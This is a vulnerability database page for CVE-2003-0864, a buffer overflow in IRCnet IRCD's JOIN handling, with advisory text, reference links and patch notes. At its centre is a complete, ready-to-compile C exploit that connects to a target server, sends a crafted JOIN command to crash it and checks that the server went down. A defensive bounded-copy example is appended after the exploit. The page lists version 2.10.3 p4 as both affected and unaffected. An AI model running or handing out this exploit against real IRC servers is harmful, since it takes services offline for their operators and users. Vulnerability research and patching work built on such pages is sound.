CVE-2003-0864
CVSS 5.0
Published: 2003-11-17 00:00:00
Revised: 2016-10-17 22:38:06

[Original] Buffer overflow in m_join in channel.c for IRCnet IRCD 2.10.x to 2.10.3p3 allows remote attackers to cause a denial of service.


[CNNVD] IRCnet IRCD Local Buffer Overflow Vulnerability (CNNVD-200311-066)

A buffer overflow exists in m_join in channel.c of IRCnet IRCD versions 2.10.x through 2.10.3p3. A remote attacker can cause a denial of service.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:ircnet:ircnet_ircd:2.10
cpe:/a:ircnet:ircnet_ircd:2.10.3_p3

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0864
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0864
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-066
(official data source) CNNVD

- Other links and resources

ftp://ftp.irc.org/irc/server/ChangeLog
(UNKNOWN)  CONFIRM  ftp://ftp.irc.org/irc/server/ChangeLog
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000765
(UNKNOWN)  CONECTIVA  CLA-2003:765
http://marc.info/?l=bugtraq&m=106606129601446&w=2
(UNKNOWN)  BUGTRAQ  20031012 buffer overflow in IRCD software
http://marc.info/?l=bugtraq&m=106667431021928&w=2
(UNKNOWN)  BUGTRAQ  20031019 [OpenPKG-SA-2003.045] OpenPKG Security Advisory (ircd)
http://www.securityfocus.com/bid/8817
(VENDOR_ADVISORY)  BID  8817
http://xforce.iss.net/xforce/xfdb/13408
(UNKNOWN)  XF  ircd-mjoin-bo(13408)

- Vulnerability information

IRCnet IRCD Local Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2003-11-17 00:00:00 2005-10-20 00:00:00
Remote
A buffer overflow exists in m_join in channel.c of IRCnet IRCD versions 2.10.x through 2.10.3p3. A remote attacker can cause a denial of service.

- Advisories and patches

OpenPKG has released an advisory (OpenPKG-SA-2003.045) that provides updates to address this issue. Detailed instructions on how to upgrade may be found in the advisory.
The vendor has released an update to address this issue.
IRCNet IRCNet IRCD 2.10

IRCNet IRCNet IRCD 2.10.3 p3

- Vulnerability information (23239)

IRCnet IRCD 2.10 Local Buffer Overflow Vulnerability (EDBID:23239)
linux dos
2003-10-13 Verified
0 millhouse
N/A
source: http://www.securityfocus.com/bid/8817/info

IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server.

/** irc2.10.3p3 and maybe below remote DOS exploit by millhouse **

   Exploit uses a bug in channel.c that happens while handling
   a specially crafted JOIN command.

   Program received signal SIGSEGV, Segmentation fault.
   0x40108f05 in strcat () from /lib/libc.so.6

   As you can see the overflow happens while dealing with strcat().
   After a few hours of debugging and testing I'll carefully say
   that there is no way to control the function's EIP to make
   code execution possible.

   I didn't check for this bug in other/modified versions of the
   IRC daemon, so it's possible that some of them are vulnerable too.
   Smarties should read the coredump to get more information.

   Greets to: servie - (the man with the drastic knowledge)
              0 - (helper in asm and debuggin' things)
              lordi - (also known as erklärbär)
              error - (i promised it)
              hidro, lexxor, tgt, mspcshl, coco, tobias...

     THIS IS A PROOF OF CONCEPT. HANDLE THIS SOURCE WITH CARE!
   /*********************************************07\\10\\2003*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#include <netdb.h>

int sckfd;

/* Resolve host, open a TCP connection to host:port and return the socket,
 * or -1 if the connection fails. */
int sockopen(char *host, int port)
{
	struct sockaddr_in addr;
	struct hostent *he;

	he = gethostbyname(host);
	if (he == NULL)
	{
		fprintf(stderr, "[-] cant handle host ..\n");
		exit(1);
	}

	memset(&addr, 0x00, sizeof(addr));
	memcpy(&addr.sin_addr, he->h_addr, he->h_length);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	sckfd = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
	if (connect(sckfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
		sckfd = -1;

	return sckfd;
}

/* Return a freshly malloc'ed random string of len lowercase letters. */
char *makestring(int len)
{
	char *tmp;
	int i;

	tmp = (char *)malloc(len + 1);
	memset(tmp, 0, len + 1);
	for (i = 0; i < len; i++)
		tmp[i] = (random() % (122 - 97)) + 97;
	return tmp;
}

void usage(char *pname)
{
	fprintf(stderr, "usage: %s -hp\n", pname);
	fprintf(stderr, "\t-h <host/ip> of the ircd\n\t-p <port> default is 6667\n\n");
	fprintf(stderr, "\tremember that the IP the exploit is running at must\n");
	fprintf(stderr, "\tmatch to a servers I-Line, else this exploit will fail..\n\n");
	exit(1);
}

int main(int argc, char *argv[])
{
	int opt, i;
	int port = 6667;
	char host[256];
	char request[1024], buffer[600];
	char reply[2000];
	char *name, *string;
	ssize_t n;

	srandom(time(NULL));

	fprintf(stdout, "irc2.10.3p3 remote dos exploit delivered by millhouse\n");
	fprintf(stdout, "-----------------------------------------------------\n");

	memset(host, 0x00, sizeof(host));
	memset(request, 0x00, sizeof(request));
	memset(buffer, 0x00, sizeof(buffer));
	memset(reply, 0x00, sizeof(reply));

	while ((opt = getopt(argc, argv, "h:p:")) != EOF)
	{
		switch (opt)
		{
		case 'h':
			strncpy(host, optarg, sizeof(host) - 1);
			break;
		case 'p':
			port = atoi(optarg);
			break;
		default:
			usage(argv[0]);
			break;
		}
	}

	if (argc < 2 || host[0] == '\0')
	{
		usage(argv[0]);
	}

	if ((port <= 0) || (port > 65535))
	{
		fprintf(stderr, "[-] invalid port ..\n");
		exit(1);
	}

	sckfd = sockopen(host, port);
	if (sckfd < 0)
	{
		fprintf(stderr, "[-] cant connect to %s:%d ..\n", host, port);
		exit(1);
	}

	fprintf(stdout, "[x] connected to %s:%d ..\n", host, port);

	/* register with a random 9-character nick */
	name = makestring(9);
	fprintf(stdout, "[x] trying to logon with nick %s ..\n", name);
	snprintf(request, sizeof(request) - 1, "USER %s localhost localhost mauer\r\n"
	                                       "NICK %s\r\n", name, name);
	write(sckfd, request, strlen(request));

	// checks simply if we are allowed to connect or not, a restricted
	// connection doesn't bother us.
	while (1)
	{
		memset(reply, 0x00, sizeof(reply));
		n = recv(sckfd, reply, sizeof(reply) - 1, 0);
		if (n <= 0)
		{
			fprintf(stderr, "[-] connection closed during logon, exploit failed ..\n");
			exit(1);
		}
		if (strstr(reply, "ERROR"))
		{
			fprintf(stderr, "[-] we dont have access, exploit failed ..\n");
			exit(1);
		}
		if (strstr(reply, "MOTD"))
		{
			fprintf(stdout, "[x] we're logged on, sending evil data ..\n");
			break;
		}
	}

	// lets build the join command and pull it out. open your
	// eyes, the root of all evil..
	// nine "!#<50 random chars>," entries followed by one short "#" channel:
	// 9 * 53 + 6 = 483 bytes, which fits the 600-byte buffer.
	for (i = 0; i < 9; i++)
	{
		string = makestring(50);
		strcat(buffer, "!#");
		strcat(buffer, string);
		strcat(buffer, ",");
		free(string);
	}

	string = makestring(5);
	strcat(buffer, "#");
	strcat(buffer, string);
	free(string);

	snprintf(request, sizeof(request) - 1, "JOIN %s\r\n", buffer);
	write(sckfd, request, strlen(request));

	close(sckfd);
	sleep(1);

	/* if the server still accepts connections, the crash did not happen */
	if (sockopen(host, port) >= 0)
	{
		fprintf(stderr, "[-] exploit failed, exiting ..\n");
		close(sckfd);
		exit(1);
	}

	fprintf(stdout, "[x] exploit worked, irc unreachable ..\n");
	return 0;
}
		
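The PoC above crashes the server because channel names from a JOIN are accumulated into a fixed buffer with unchecked strcat(). As an added defensive example (not IRCnet IRCD's code and not the PoC author's), here is how that accumulation looks when the length is checked before every copy and an over-long list is refused outright; CHANLIST_MAX, join_list_bounded and join_list_status are hypothetical names and the 64-byte limit is constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CHANLIST_MAX 64	/* constructed small limit, not the size IRCnet IRCD uses */

/* Copy a comma-separated JOIN channel list into a fixed buffer, accounting
 * for the length BEFORE each copy instead of strcat()ing blindly.
 * Returns bytes written (without NUL), -1 for a malformed name (empty or not
 * starting with a channel prefix '#', '&', '!', '+'), and -2 when the list
 * would overflow the buffer: the whole command is refused, never truncated. */
int join_list_bounded(const char *list, char *out, size_t outsz)
{
	size_t used = 0;
	const char *p = list;

	if (outsz == 0) return -2;
	out[0] = '\0';
	while (*p) {
		const char *sep = strchr(p, ',');
		size_t n = sep ? (size_t)(sep - p) : strlen(p);
		size_t need = n + (used ? 1 : 0);	/* name plus separator */
		if (n == 0 || strchr("#&!+", p[0]) == NULL) return -1;
		if (used + need + 1 > outsz) return -2;	/* +1 for the NUL */
		if (used) out[used++] = ',';
		memcpy(out + used, p, n);
		used += n;
		out[used] = '\0';
		if (!sep) break;
		p = sep + 1;
	}
	return (int)used;
}

/* Run the check with a buffer capped at cap bytes (at most CHANLIST_MAX). */
int join_list_status(const char *list, size_t cap)
{
	char buf[CHANLIST_MAX];
	if (cap > sizeof buf) cap = sizeof buf;
	return join_list_bounded(list, buf, cap);
}

int main(void)
{
	char big[512] = "";	/* constructed: nine 50-char "!#" names then "#bbbbb", the shape the PoC sends */
	for (int i = 0; i < 9; i++) strcat(big, "!#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,");
	strcat(big, "#bbbbb");
	printf("short=%d long=%d\n", join_list_status("#chan1,#chan2", CHANLIST_MAX), join_list_status(big, CHANLIST_MAX));
	return 0;
}
```

The same check applied per element before the copy is what turns the PoC's input from a crash into a rejected command.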

- Vulnerability information

11753
IRCnet IRCD m_join Local Overflow
Input Manipulation
Loss of Integrity
Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-10-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

IRCnet IRCD Local Buffer Overflow Vulnerability
Boundary Condition Error 8817
Yes No
2003-10-13 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Piotr KUCHARSKI <chopin@sgh.waw.pl>.

- Affected program versions

IRCNet IRCNet IRCD 2.10.3 p3
+ OpenPKG OpenPKG 1.3
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG Current
IRCNet IRCNet IRCD 2.10
IRCNet IRCNet IRCD 2.10.3 p4
+ OpenPKG OpenPKG Current

- Unaffected program versions

IRCNet IRCNet IRCD 2.10.3 p4
+ OpenPKG OpenPKG Current

- Vulnerability discussion

IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server.

- Exploit

A proof of concept exploit for this issue has been made available.

- Solution

OpenPKG has released an advisory (OpenPKG-SA-2003.045) that provides updates to address this issue. Detailed instructions on how to upgrade may be found in the advisory.

The vendor has released an update to address this issue.


IRCNet IRCNet IRCD 2.10

IRCNet IRCNet IRCD 2.10.3 p3

- References